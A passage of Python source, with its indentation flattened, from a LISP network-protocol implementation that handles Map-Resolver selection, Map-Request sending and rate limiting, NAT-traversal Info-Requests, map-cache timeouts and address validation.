mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
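# Illustrative sketch (names hypothetical): if the EID hashes to decent
# index 7 and the configured DNS suffix is "pull.example.com", the lookup
# name becomes "7.pull.example.com" and the least-recently-used Map-Resolver
# configured with that dns-name is returned.
#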
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Check IGMP packet first. And don't do IP checksum and don't test TTL.
#
if (ord(packet[9]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check the hop-limit and if not 0, decrement it and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
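# Illustrative sketch (constant values hypothetical): if
# LISP_MAP_REQUEST_RATE_LIMIT were 5 seconds and the last data-triggered
# Map-Request went out 2 seconds ago, this returns True (suppress); at 7
# seconds elapsed it returns False (send). The check is bypassed while the
# temporary no-rate-limit window is active.
#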
def lisp_rate_limit_map_request(dest):
now = lisp_get_timestamp()
#
# Do we have rate-limiting disabled temporarily?
#
elapsed = now - lisp_no_map_request_rate_limit
if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
left = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
dprint("No Rate-Limit Mode for another {} secs".format(left))
return(False)
#endif
#
# Did we send a Map-Request recently?
#
if (lisp_last_map_request_sent == None): return(False)
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format( \
green(dest.print_address(), False), round(elapsed, 3)))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port as 4341 so the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
# Hold request nonce so we can match replies from xTRs that have multiple
# RLOCs. The reason is that the reply's source address may not be the probed
# destination. And in our ETR implementation, we can get the probe request
# destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for Map-Request rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so the lisp-itr and lisp-etr processes don't
# both add and delete host routes (for Info-Request sending purposes) at
# the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# Wait for the host route to go away before proceeding. We will use
# the map-server host route as an IPC lock. For the data port, only
# the lisp-etr process will add a host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to the same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented-out call below would
# allow Info-Requests to use source port 4342 but would break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from them
# specially and proxy Map-Requests when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devices.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is, check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due to timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (mc.last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Do not time out NAT-traversal default entries (0.0.0.0/0 and 0::/0).
#
if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
return([True, delete_list])
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
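# The walk carries its state in parms = [delete_list, checkpoint_list]:
# timed-out entries are collected in delete_list and removed after the walk,
# while surviving entries are written to the checkpoint file.
#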
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from the map-cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary, keyed by Info-Request hostname,
# with an array of lisp_nat_info() values. We keep all the current and
# previous NAT state associated with the hostname so we can track how much
# movement is occurring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
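# Illustrative layout of lisp_nat_state_info (values hypothetical), youngest
# entry first:
#
#   lisp_nat_state_info["etr-branch-1"] = [
#       lisp_nat_info("128.107.1.1", "etr-branch-1", 16002),   # current
#       lisp_nat_info("128.107.1.1", "etr-branch-1", 14001)    # previous
#   ]
#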
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the new state does not match the youngest entry. See if it exists as
# an older entry. If not, we prepend the new state; otherwise, we prepend
# the new state and remove the old entry from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request on, so we can install
# an ephemeral static route to force the Info-Request to go out a specific
# interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
#endfor
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
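# Illustrative inputs this accepts (addresses hypothetical):
#
#   lisp_valid_address_format("address", "10.1.2.3")         # IPv4
#   lisp_valid_address_format("address", "2001:db8::1")      # IPv6
#   lisp_valid_address_format("address", "0011-2233-4455")   # MAC
#   lisp_valid_address_format("address", "'web-server'")     # distinguished-name
#   lisp_valid_address_format("address", "+14085551212")     # E.164
#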
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
